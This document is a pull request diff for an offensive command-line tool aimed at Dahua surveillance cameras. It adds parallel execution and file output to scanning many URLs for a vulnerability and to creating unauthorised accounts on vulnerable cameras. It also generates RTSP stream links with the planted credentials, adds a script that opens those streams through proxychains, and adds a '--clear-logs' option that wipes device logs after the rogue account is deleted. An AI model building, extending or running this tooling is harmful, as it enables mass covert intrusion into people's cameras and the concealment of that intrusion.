### PR TITLE
Input output and parallel tasks improvements

### DIFF
--- a/mpv-open
+++ b/mpv-open
@@ -1,0 +1,14 @@
+#!/usr/bin/env bash
+
+TARGETS_FILE="${1}"
+
+if [ -z "${TARGETS_FILE}" ]
+then
+    echo "usage: ${0} <rtsp stream file>"
+    exit 1
+fi
+
+readarray -t lines < "${TARGETS_FILE}"
+for line in "${lines[@]}"; do
+    proxychains mpv $line
+done

--- a/packages/cli.py
+++ b/packages/cli.py
@@ -1,17 +1,18 @@
 
-import click
-import halo
+import pathlib
+from multiprocessing import Pool
+from typing import Tuple
 
+import click
+import halo  # type: ignore
 from packages.cli_state import CliState
-from packages.exploit import IExploit, Success, Error
+from packages.exploit import Error, IExploit, Success
 from packages.exploit_repository import ExploitRepository
 from packages.http_params import parse_http_params
-from typing import List
-from multiprocessing import Pool
 
 
-def list_exploit_names() -> List[str]:
-    exploit_names = []
+def list_exploit_names() -> list[str]:
+    exploit_names: list[str] = []
 
     for exploit in ExploitRepository().get_available_exploits():
         exploit_names.append(exploit.name().lower())
@@ -22,10 +23,10 @@ def list_exploit_names() -> List[str]:
 
 class CommandLoader(click.MultiCommand):
 
-    def list_commands(self, ctx):
+    def list_commands(self, ctx: click.core.Context):
         return list_exploit_names()
 
-    def get_command(self, ctx, cmd_name):
+    def get_command(self, ctx: click.core.Context, cmd_name: str):
 
         exploit: IExploit | None = ExploitRepository().find_exploit_by_name(cmd_name, case_insensitive=True)
         if exploit:
@@ -36,20 +37,33 @@ class CommandLoader(click.MultiCommand):
 
 @click.group()
 @click.option("--url", help="Target URL")
-@click.option("--urls", help="File path to list of URLs, separated by lines")
-@click.option("--threads", help="Number of threads to use (default 1)")
+@click.option("--urls",
+    help="File path to list of URLs, separated by lines",
+    type=click.Path(exists=True, readable=True)
+)
+@click.option("--out",
+    help="File path to result of operation. For example, test will output vulnerable urls to this file",
+    type=click.Path(dir_okay=False, writable=True, file_okay=True)
+)
+@click.option("--threads", help="Number of threads to use (default 1)", default=1)
 @click.pass_context
-def cli(ctx, url, urls, threads):
+def cli(ctx: click.core.Context, url: str | None, urls: str | None, out: str | None, threads: int):
+    target_urls: list[str] | None = None
     if urls:
-        urls = _read_urls_from_path(urls)
-    else:
-        urls = [url,]
-    ctx.obj = CliState(urls, int(threads or 1))
+        target_urls = _read_urls_from_path(pathlib.Path(urls))
+    elif url:
+        target_urls = [url,]
+
+    ctx.obj = CliState(
+        urls=target_urls,
+        output_file=pathlib.Path(out) if out else None,
+        threads=threads
+    )
 
 
 @cli.command(cls=CommandLoader)
 @click.pass_context
-def exploit(ctx):
+def exploit(ctx: click.core.Context):
     pass
 
 
@@ -57,17 +71,25 @@ def exploit(ctx):
 @click.pass_obj
 def test(state: CliState):
     for exploit in ExploitRepository().get_available_exploits():
-        exploit_input = []
+        exploit_input: list[Tuple[IExploit, str]] = []
         # Collect parameters to be passed to _test_exploit method in thread pool
         for url in state.urls or []:
             exploit_input.append((exploit, url.strip()))
 
         with Pool(state.threads or 1) as thread_pool:
             results = thread_pool.starmap(_test_exploit, exploit_input)
-            print('--- Vulnerable Hosts ---')
-            for host in results:
-                if host:
-                    print(host)
+            if state.output_file:
+                print(f"Writing result to: {state.output_file}")
+                with open(state.output_file, "w") as f:
+                    for host in results:
+                        if host:
+                            f.write(f"{host}\n")
+            else:
+                print('--- Vulnerable Hosts ---')
+                for host in results:
+                    if host:
+                        print(host)
+
 
 def _test_exploit(exploit: IExploit, url: str) -> str | None:
     http_params = parse_http_params(url)
@@ -76,17 +98,17 @@ def _test_exploit(exploit: IExploit, url: str) -> str | None:
     with halo.Halo(text=f"Attempting exploit '{exploit.name()}' on '{url}'", spinner="dots") as spinner:
         match exploit.detect(http_params):
             case Success():
-                spinner.succeed(
+                spinner.succeed(  # type: ignore
                     f"Target '{url}' is vulnerable to '{exploit.name()}'")
                 result = url
 
             case Error() as error:
                 reason = f"Target '{url}' is NOT vulnerable to '{exploit.name()}'. Reason: {error.reason}"
-                spinner.fail(reason)
+                spinner.fail(reason)  # type: ignore
 
     return result
 
 
-def _read_urls_from_path(path: str) -> list[str]:
+def _read_urls_from_path(path: pathlib.Path) -> list[str]:
     with open(path, 'r') as file:
         return list(filter(lambda url: url.strip() != "", file.readlines()))

--- a/packages/cli_state.py
+++ b/packages/cli_state.py
@@ -1,7 +1,10 @@
 
+import pathlib
 from dataclasses import dataclass
+
 
 @dataclass
 class CliState:
     urls: list[str] | None = None
+    output_file: pathlib.Path | None = None
     threads: int | None = 1

--- a/packages/dahua_exploit.py
+++ b/packages/dahua_exploit.py
@@ -1,14 +1,16 @@
 from abc import ABCMeta, abstractmethod
-from typing import Any, Callable, List
+from concurrent.futures import ThreadPoolExecutor
+from typing import Any, Callable, List, Tuple, TypeVar
 
 from packages.cli_state import CliState
 from packages.dahua import Camera, CameraSession, UserInfo
-from packages.exploit import CameraUser, ExploitParams, IExploit, Success, Error, SuccessVal
+from packages.exploit import CameraUser, Error, ExploitParams, IExploit, Success, SuccessVal
 from packages.http_params import HttpParams, parse_http_params
 
+T = TypeVar("T")
 DahuaExploitImplFn = Callable[[Camera], CameraSession | None]
 SessionOperationFn = Callable[[Camera, CameraSession], Success | Error]
-SessionOperationValFn = Callable[[Camera, CameraSession], SuccessVal | Error]
+SessionOperationValFn = Callable[[Camera, CameraSession], SuccessVal[T] | Error]
 
 
 class IDahuaExploit(IExploit, metaclass=ABCMeta):
@@ -50,7 +52,7 @@ class DahuaExploitBase(IDahuaExploit):
 
         return self._camera
 
-    def _try_aqcuire_session(self, fn: DahuaExploitImplFn) -> SuccessVal | Error:
+    def _try_aqcuire_session(self, fn: DahuaExploitImplFn) -> SuccessVal[CameraSession] | Error:
         if not self._camera:
             return Error(reason="Camera not configured")
 
@@ -74,7 +76,7 @@ class DahuaExploitBase(IDahuaExploit):
         else:
             return Error(reason="No session")
 
-    def _with_session_ret(self, fn: SessionOperationValFn) -> SuccessVal | Error:
+    def _with_session_ret(self, fn: SessionOperationValFn[T]) -> SuccessVal[T] | Error:
         if self._session:
             try:
                 return fn(self._get_camera_instance(), self._session)
@@ -101,7 +103,7 @@ class DahuaNetKeyboardExploit(DahuaExploitBase):
         return self.exploit()
 
     def logout(self) -> Success | Error:
-        return self._with_session(lambda cam, session: \
+        return self._with_session(lambda cam, session:
             self._wrap_any_as_success(cam.logout(session))
         )
 
@@ -121,7 +123,6 @@ class DahuaNetKeyboardExploit(DahuaExploitBase):
                     return err
         finally:
             _ = self._with_session(lambda cam, session: self._wrap_any_as_success(cam.logout(session)))
-
 
     def delete_account(self) -> Success | Error:
         def _delete_user(cam: Camera, session: CameraSession):
@@ -173,39 +174,78 @@ class DahuaNetKeyboardExploit(DahuaExploitBase):
 
         @click.group("netkeyboard")
         @click.pass_context
-        def cli(ctx):
+        def cli(ctx: click.core.Context):
             pass
 
         @click.command()
         @click.argument("username")
         @click.argument("password")
         @pass_cli_state
-        def create_account(state, username, password):
+        def create_account(state: CliState, username: str, password: str):
+            if not state.urls:
+                raise Exception("No url(s) specified")
+
             user = CameraUser(username, password)
 
-            for url in state.urls:
+            def _create_account_impl(data: Tuple[CameraUser, str]) -> SuccessVal[HttpParams] | Error:
+                user, url = data
+
                 http_params = parse_http_params(url)
                 exploit = DahuaNetKeyboardExploit()
-                exploit.configure(ExploitParams(
-                    http_params=http_params,
-                    user=user
-                ))
+                exploit.configure(ExploitParams(http_params, user))
 
                 match exploit.create_account():
                     case Success():
-                        print(f"Account {user} created at {url}")
-                        stream_url = f'rtsp://{user.username}:{user.password}@{url.strip().replace("http://", "").replace("https://", "")}'
-                        print(f"Stream available at 'mpv {stream_url}'")
+                        return SuccessVal(http_params)
                     case Error() as err:
-                        print(f"Error at {url}: {err}")
+                        return err
+
+            task_input: list[Tuple[CameraUser, str]] = [
+                (user, url.strip()) for url in state.urls
+            ]
+
+            with ThreadPoolExecutor(max_workers=state.threads or 1) as executor:
+                results: List[SuccessVal[HttpParams] | Error] = \
+                    list(executor.map(_create_account_impl, task_input))
+
+                executor.shutdown(wait=True)
+
+                successful_results: List[HttpParams] = []
+                for result in results:
+                    match result:
+                        case SuccessVal(val):
+                            successful_results.append(val)
+                        case _:
+                            pass
+
+                rtsp_stream_urls: list[str] = []
+                for result in successful_results:
+                    print(f"Account {user} created at {result.scheme}{result.hostname}:{result.port}")
+                    stream_url = f"rtsp://{user.username}:{user.password}@{result.hostname}:{result.port}"
+                    rtsp_stream_urls.append(stream_url)
+
+                if state.output_file:
+                    with open(state.output_file, "w") as f:
+                        for stream_url in rtsp_stream_urls:
+                            f.write(f"{stream_url}\n")
+                else:
+                    print("Available streams:")
+                    for stream_url in rtsp_stream_urls:
+                        print(stream_url)
 
         @click.command()
         @click.argument("username")
+        @click.option("--clear-logs", help="Clear logs after deleting account", is_flag=True, default=False)
         @click.pass_obj
-        def delete_account(state, username):
+        def delete_account(state: CliState, username: str, clear_logs: bool | None):
+            if not state.urls:
+                raise Exception("No url(s) specified")
+
             user = CameraUser(username, None)
 
-            for url in state.urls:
+            def _delete_account_impl(data: Tuple[CameraUser, str]):
+                user, url = data
+
                 http_params = parse_http_params(url)
                 exploit = DahuaNetKeyboardExploit()
                 exploit.configure(ExploitParams(
@@ -216,12 +256,31 @@ class DahuaNetKeyboardExploit(DahuaExploitBase):
                 match exploit.delete_account():
                     case Success():
                         print(f"Account {user} deleted at {url}")
+
+                        if clear_logs:
+                            match exploit.clear_logs():
+                                case Success():
+                                    print(f"Logs cleared at {url}")
+                                case Error() as err:
+                                    print(f"Error at {url}: {err}")
+
                     case Error() as err:
                         print(f"Error at {url}: {err}")
 
+            task_input: list[Tuple[CameraUser, str]] = [
+                (user, url.strip()) for url in state.urls
+            ]
+
+            with ThreadPoolExecutor(max_workers=state.threads or 1) as executor:
+                executor.map(_delete_account_impl, task_input)
+                executor.shutdown(wait=True)
+
         @click.command()
         @click.pass_obj
-        def list_users(state):
+        def list_users(state: CliState):
+            if not state.urls:
+                raise Exception("No url(s) specified")
+
             for url in state.urls:
                 http_params = parse_http_params(url)
                 exploit = DahuaNetKeyboardExploit()
@@ -242,8 +301,11 @@ class DahuaNetKeyboardExploit(DahuaExploitBase):
 
         @click.command()
         @click.pass_obj
-        def clear_logs(state):
-            for url in state.urls:
+        def clear_logs(state: CliState):
+            if not state.urls:
+                raise Exception("No url(s) specified")
+
+            def _clear_logs_impl(url: str):
                 http_params = parse_http_params(url)
                 exploit = DahuaNetKeyboardExploit()
                 exploit.configure(ExploitParams(
@@ -256,6 +318,14 @@ class DahuaNetKeyboardExploit(DahuaExploitBase):
 
                     case Error() as err:
                         print(f"Error at {url}: {err}")
+
+            task_input: list[str] = [
+                url.strip() for url in state.urls
+            ]
+
+            with ThreadPoolExecutor(max_workers=state.threads or 1) as executor:
+                executor.map(_clear_logs_impl, task_input)
+                executor.shutdown(wait=True)
 
         cli.add_command(create_account)
         cli.add_command(delete_account)


### PR DESCRIPTION
- Add the option to save output from test and exploit to a file as a QoL feature.
- For the delete account option a flag has been added to optionally clear the logs
- Create, Delete and Clear now have support for --threads=N, making them run in parallel to speed up the tasks when you have a lot of entries in an urls file